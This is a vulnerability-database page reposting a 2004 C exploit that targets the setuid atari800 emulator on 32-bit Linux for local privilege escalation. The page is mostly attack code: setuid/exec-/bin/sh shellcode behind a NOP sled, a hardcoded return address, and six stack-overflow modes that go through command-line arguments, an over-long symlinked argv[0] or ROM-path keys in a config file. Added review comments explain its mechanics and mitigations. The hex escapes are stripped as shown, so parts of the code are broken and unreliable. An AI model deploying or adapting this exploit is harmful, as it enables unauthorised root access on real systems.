atari800 – Local Privilege Escalation
漏洞ID | 1054775 | 漏洞类型 | |
发布时间 | 2004-11-25 | 更新时间 | 2004-11-25 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* Exploit for atari800 by pi3 (pi3ki31ny)
*
* pi3@pi3:~$ ./p
*
* ...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...
*
* Ussage:
* [+] ./p [options]
*
* -? <this help screen>
* -v choose a bug:
* 1 - first bug (in all versions Atari800)
* 2 - second bug (in older Atari800 - modiy argv[0])
* 3 - third bug (in config file - OS/A_ROM)
* 4 - fourth bug (in config file - OS/B_ROM)
* 5 - fifth bug (in config file - XL/XE_ROM)
* 6 - sixth bug (in config file - BASIC_ROM)
* -o <offset>
* -p PATH
*
* pi3@pi3:~$
*
* Atari800 has the suid bit set in the default installation.
* Best regards pi3 (pi3ki31ny).
*
* "Kazdemu trafi sie gowno...!"
*
* Greetz: [greetz on my web] && other my friends (you know who you are)
*
* ...::: -=[ www.pi3.int.pl ]=- :::...
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <assert.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define PATH "/usr/local/bin/atari800"
#define DIRS 256
#define CONFIG ".atari800.cfg"
/* ...::: -=[ www.pi3.int.pl ]=- :::... */
/*
 * Payload bytes that main() places at the tail of a NOP-sled (0x90) buffer
 * and hands to the target as its only environment string. The author's
 * inline comments label the segments: setuid(0), setgid(0), exec /bin/sh,
 * exit(0); the leading unlabelled segment is presumably the banner print.
 * As rendered on this page the backslashes of the hex escapes are missing,
 * so the literal is ordinary ASCII text rather than the intended byte
 * sequence. The payload is only reachable if the setuid emulator overflows
 * a stack buffer with attacker-controlled argv/config data and the stack is
 * executable; removing the setuid bit, a non-executable stack, or ASLR each
 * neutralise it independently of the bytes here.
 */
char shellcode[] = "x31xdbx31xc0x31xd2xb2x2dx6ax0ax68x3a"
"x2ex2ex2ex68x2dx20x3ax3ax68x6cx20x5d"
"x3dx68x6ex74x2ex70x68x69x33x2ex69x68"
"x77x77x2ex70x68x3dx5bx20x77x68x3ax3a"
"x20x2dx68x2ex2ex2ex3ax89xe1xb0x04xcd"
"x80"
/* setuid(0) */
"x31xdbx89xd8xb0x17xcdx80"
/* setgid(0) */
"x31xdbx89xd8xb0x2excdx80"
/* exec /bin/sh */
"x31xc0x50x68x2fx2fx73x68x68x2fx62x69"
"x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcd"
"x80"
/* exit(0) */
"x31xdbx89xd8xb0x01xcdx80";
/*
 * Return the stack address that main() repeats into the target's buffers.
 *
 * a1, a2: accepted for interface compatibility but not used. The original
 *         author left a commented-out formula (0xbffffffa minus the two
 *         string lengths) showing the address was once derived from them;
 *         the function now returns a fixed guess instead.
 *
 * The constant only makes sense for a 32-bit process with a predictable
 * stack location, i.e. a system without ASLR; on anything else the guess
 * is meaningless, which is exactly what that mitigation is for.
 */
long ret_ad(char *a1, char *a2) {
    (void)a1;
    (void)a2;
    const long guessed_stack_addr = 0xbfffee01;
    return guessed_stack_addr;
}
/*
 * Print the option summary to stdout and terminate the process.
 *
 * arg: argv[0] of this program, shown as the command name in the summary.
 *
 * Never returns: exit(-1) ends the process (exit status 255 on POSIX), so
 * the int return type is never honoured. main() calls it for -?, for any
 * unknown option, when -v is missing, and when the target path cannot be
 * opened.
 *
 * NOTE(review): the help-text literal below is rendered on this page across
 * several lines with its \n and \t escapes stripped; as shown it is not a
 * valid C string literal.
 */
int ussage(char *arg) {
printf("nt...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...n");
// The option list mirrors the header comment at the top of the file.
printf("ntUssage:nt[+] %s [options]n
-? <this help screen>
-v choose a bug:
1 - first bug (in all versions Atari800)
2 - second bug (in older Atari800 - modiy argv[0])
3 - third bug (in config file - OS/A_ROM)
4 - fourth bug (in config file - OS/B_ROM)
5 - fifth bug (in config file - XL/XE_ROM)
6 - sixth bug (in config file - BASIC_ROM)
-o <offset>
-p PATHnn",arg);
exit(-1);
}
/*
 * Entry point.
 *
 * Options (see ussage()): -v selects which of six emulator flaws to target,
 * -o adds an offset to the guessed return address from ret_ad(), -p names
 * the emulator binary (default PATH). All six modes share one payload
 * delivery: envp[] is filled with 0x90 (a NOP sled), the shellcode is copied
 * to its tail, and that single string becomes the target's whole environment
 * via execle(). The modes differ only in which input carries the buffer
 * filled with the guessed address:
 *   1    an over-long command-line argument (per the header: all versions);
 *   2    an over-long argv[0], arranged by running the target through a
 *        symlink placed inside a directory with a 250-byte name (older
 *        versions);
 *   3-6  an over-long OS/A_ROM, OS/B_ROM, XL/XE_ROM or BASIC_ROM value in a
 *        config file handed to the target with -config.
 * The repeated return-address filling suggests each targeted flaw is an
 * unbounded copy of one of these strings into a fixed-size stack buffer in
 * the emulator; the emulator-side fix is bounds-checking those copies, and
 * the privilege impact disappears entirely if the binary is not installed
 * setuid.
 *
 * Review notes on this code itself:
 *  - Everything is 32-bit Linux specific: the address from ret_ad() and the
 *    `long` stores assume sizeof(long) == 4 and a fixed stack layout (no
 *    ASLR); the payload also needs an executable stack.
 *  - `ret` is a long but is printed with %x.
 *  - Modes 1 and 3-6 exec the compiled-in PATH, so -p only affects the
 *    readability check there; only mode 2 links to `path`.
 *  - mkdir/chdir/symlink are called inside assert(); with NDEBUG defined
 *    those calls are compiled out.
 *  - The PRINT_COMMAND line written to the default config uses a %s
 *    conversion with no argument.
 *
 * Returns 0 only if an execle() call fails (on success the process is
 * replaced). A -v value outside 1..6 falls off the end of the function,
 * which in C99 main() means an implicit return of 0.
 */
int main(int argc, char *argv[]) {
// ret: guessed return address; buf_addr: cursor used to store it repeatedly.
long ret,*buf_addr;
// envp is a single string (NOP sled + payload), not an environment vector;
// path defaults to the compiled-in PATH and can be overridden with -p.
char envp[8196],*path=PATH;
// Environment vector handed to execle(): sh[0] = envp, sh[1] = NULL.
static char *sh[0x02];
// buf: directory/symlink name (mode 2); link: argv[1] (mode 1) or the
// symlink path (mode 2); conf: over-long ROM path value for modes 3-6.
char buf[DIRS],link[500],conf[5000];
int i,opt,op2=0,offset=0;
FILE *fp;
// Option parsing. -?, an unknown option, or a missing -v end in ussage(),
// which exits.
while((opt = getopt(argc,argv,"p:o:v:?")) != -1) {
switch(opt) {
case 'o':
offset=atoi(optarg);
break;
case 'p':
path=optarg;
break;
case 'v':
op2=atoi(optarg);
break;
case '?':
default:
ussage(argv[0]);
break;
}
}
if (op2==0)
ussage(argv[0]);
// The target binary must at least be readable; otherwise report and exit.
if ( (fp=fopen(path,"r"))==NULL) {
printf("n*tI can't open path to victim! - %st*nn",path);
ussage(argv[0]);
} fclose(fp);
// Make sure a config file exists in the current directory; if not, write
// one with stock values.
if ( (fp=fopen(CONFIG,"r"))==NULL) {
if ( (fp=fopen(CONFIG,"w"))==NULL) {
printf("I can't create config file!n");
exit(-1);
}
printf("nCreating config file...nnn");
fprintf(fp,"Atari 800 Emulator, Version 1.3.0n");
fprintf(fp,"OS/A_ROM=atariosa.romn");
fprintf(fp,"OS/B_ROM=atariosb.romn");
fprintf(fp,"XL/XE_ROM=atarixl.romn");
fprintf(fp,"BASIC_ROM=ataribas.romn");
fprintf(fp,"5200_ROM=n");
fprintf(fp,"DISK_DIR=.n");
fprintf(fp,"ROM_DIR=.n");
fprintf(fp,"H1_DIR=n");
fprintf(fp,"H2_DIR=n");
fprintf(fp,"H3_DIR=n");
fprintf(fp,"H4_DIR=n");
fprintf(fp,"HD_READ_ONLY=1n");
fprintf(fp,"EXE_DIR=n");
fprintf(fp,"STATE_DIR=n");
// NOTE(review): "%s" here has no matching argument, which is undefined
// behaviour; "%%s" was presumably intended so the file gets "lpr %s".
fprintf(fp,"PRINT_COMMAND=lpr %sn");
fprintf(fp,"SCREEN_REFRESH_RATIO=1n");
fprintf(fp,"MACHINE_TYPE=Atari XL/XEn");
fprintf(fp,"RAM_SIZE=64n");
fprintf(fp,"DEFAULT_TV_MODE=PALn");
fprintf(fp,"DISABLE_BASIC=1n");
fprintf(fp,"ENABLE_SIO_PATCH=1n");
fprintf(fp,"ENABLE_H_PATCH=1n");
fprintf(fp,"ENABLE_P_PATCH=1n");
fprintf(fp,"ENABLE_NEW_POKEY=1n");
fprintf(fp,"STEREO_POKEY=0n");
} fclose(fp);
// Mode 1: the address-filled buffer is passed to the target as argv[1].
if (op2==1) {
printf("nt...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...n");
printf("nt[+] Bulding buffors!n");
ret=ret_ad(shellcode,path);
ret+=offset;
// NOTE(review): ret is a long but is printed with %x.
printf("t[+] Using adres 0x%xn",ret);
printf("t[+] Using first bug in Atari800n");
// Payload: NOP sled (0x90) across the whole buffer, shellcode at the very
// end, handed to the target as its only environment string.
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
// link = "AA" followed by the guessed address repeated; the last byte is
// then replaced with a space.
strcpy(link,"AA");
buf_addr=(long*)&link[2];
for(i=0;i<500;i+=4)
*(buf_addr)++ = ret;
link[499]=' ';
printf("nExecuting the vuln program - %snn",PATH);
// Note the compiled-in PATH is executed here, not `path` from -p.
// execle() replaces this process on success; the lines after it run only
// if the exec itself failed.
execle(PATH,PATH,link,0,sh);
printf("Kazdemu trafi sie gowno...!n");
return 0;
} else if (op2==2) {
// Remove leftovers of a previous run (the 250-'A' directory and a file
// named "1") through a shell; rmdir()/unlink() would avoid the shell.
system("rm -rf `perl -e 'print "\x41"x250'`; rm -f 1");
printf("nt...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...n");
printf("nt[+] Bulding buffors!n");
ret=ret_ad(shellcode,path);
ret+=offset;
// NOTE(review): ret is a long but is printed with %x.
printf("t[+] Using adres 0x%xn",ret);
printf("t[+] Using second bug in Atari800n");
// Same payload construction as mode 1.
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
// Mode 2 targets argv[0]: a directory named from buf (250 'A's) is created
// and entered, a symlink to `path` named from the address-filled buf is
// placed in it, and the target is run through "./" + 252 'A' + "/" + buf so
// that its own argv[0] is the over-long string.
memset(buf,0x41,(size_t)250);
strcpy(link,"./");
memset(&link[2],0x41,(size_t)252);
// NOTE(review): these side-effecting calls live inside assert(); with
// NDEBUG defined they are compiled out entirely.
assert(mkdir(buf, 0755) != -1);
assert(chdir(buf) != -1);
buf_addr=(long*)buf;
for (i=0; i<80; i+=4)
*(buf_addr)++ = ret;
buf[80]=' ';
// snprintf(link+252,500,"/`perl -e 'print "\x01\xee\xff\xbf"x20'` pi3");
snprintf(link+252,500,"/%s",buf);
assert(symlink(path, buf) != -1);
assert(chdir("../") != -1);
printf("nExecuting the vuln program - %snn",link);
// system(link);
// execle() replaces this process on success; the lines after it run only
// if the exec itself failed.
execle(link,link,"pi3",0,sh);
printf("Kazdemu trafi sie gowno...!n");
return 0;
} else if (op2==3) {
// Modes 3-6 share one shape: conf is filled with the guessed address and
// written as the value of one ROM-path key in .pi3.conf, which the target
// is told to read via -config. They differ only in the key and, for 5 and
// 6, in a one-byte instead of two-byte prefix before the addresses.
printf("nt...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...n");
printf("nt[+] Bulding buffors!n");
ret=ret_ad(shellcode,path);
ret+=offset;
// NOTE(review): ret is a long but is printed with %x.
printf("t[+] Using adres 0x%xn",ret);
printf("t[+] Using third bug in Atari800n");
// Same payload construction as mode 1.
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(conf,"AA");
buf_addr=(long*)&conf[2];
for(i=0;i<5000;i+=4)
*(buf_addr)++ = ret;
conf[4999]=' ';
// Shelling out to remove the file is redundant: fopen(...,"w") truncates it.
system("rm -rf .pi3.conf");
if ( (fp=fopen(".pi3.conf","w")) == NULL) {
printf("I can't create config file!nExiting...n");
exit(-1);
}
fprintf(fp,"OS/A_ROM=%sn",conf);
printf("nExecuting the vuln program - %snn",PATH);
// Compiled-in PATH again, not `path`. execle() replaces this process on
// success; the lines after it run only if the exec itself failed.
execle(PATH,PATH,"-config",".pi3.conf",0,sh);
printf("Kazdemu trafi sie gowno...!n");
return 0;
} else if (op2==4) {
// Mode 4: as mode 3, with the OS/B_ROM key.
printf("nt...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...n");
printf("nt[+] Bulding buffors!n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("t[+] Using adres 0x%xn",ret);
printf("t[+] Using fourth bug in Atari800n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(conf,"AA");
buf_addr=(long*)&conf[2];
for(i=0;i<5000;i+=4)
*(buf_addr)++ = ret;
conf[4999]=' ';
system("rm -rf .pi3.conf");
if ( (fp=fopen(".pi3.conf","w")) == NULL) {
printf("I can't create config file!nExiting...n");
exit(-1);
}
fprintf(fp,"OS/B_ROM=%sn",conf);
printf("nExecuting the vuln program - %snn",PATH);
execle(PATH,PATH,"-config",".pi3.conf",0,sh);
printf("Kazdemu trafi sie gowno...!n");
return 0;
} else if (op2==5) {
// Mode 5: as mode 3, with the XL/XE_ROM key and a one-byte "A" prefix.
printf("nt...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...n");
printf("nt[+] Bulding buffors!n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("t[+] Using adres 0x%xn",ret);
printf("t[+] Using fifth bug in Atari800n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(conf,"A");
buf_addr=(long*)&conf[1];
for(i=0;i<5000;i+=4)
*(buf_addr)++ = ret;
conf[4999]=' ';
system("rm -rf .pi3.conf");
if ( (fp=fopen(".pi3.conf","w")) == NULL) {
printf("I can't create config file!nExiting...n");
exit(-1);
}
fprintf(fp,"XL/XE_ROM=%sn",conf);
printf("nExecuting the vuln program - %snn",PATH);
execle(PATH,PATH,"-config",".pi3.conf",0,sh);
printf("Kazdemu trafi sie gowno...!n");
return 0;
} else if (op2==6) {
// Mode 6: as mode 5, with the BASIC_ROM key.
printf("nt...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...n");
printf("nt[+] Bulding buffors!n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("t[+] Using adres 0x%xn",ret);
printf("t[+] Using sixth bug in Atari800n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(conf,"A");
buf_addr=(long*)&conf[1];
for(i=0;i<5000;i+=4)
*(buf_addr)++ = ret;
conf[4999]=' ';
system("rm -rf .pi3.conf");
if ( (fp=fopen(".pi3.conf","w")) == NULL) {
printf("I can't create config file!nExiting...n");
exit(-1);
}
fprintf(fp,"BASIC_ROM=%sn",conf);
printf("nExecuting the vuln program - %snn",PATH);
execle(PATH,PATH,"-config",".pi3.conf",0,sh);
printf("Kazdemu trafi sie gowno...!n");
return 0;
}
// Any other -v value reaches this point with no explicit return (main()
// implicitly returns 0 in C99).
}
// milw0rm.com [2004-11-25]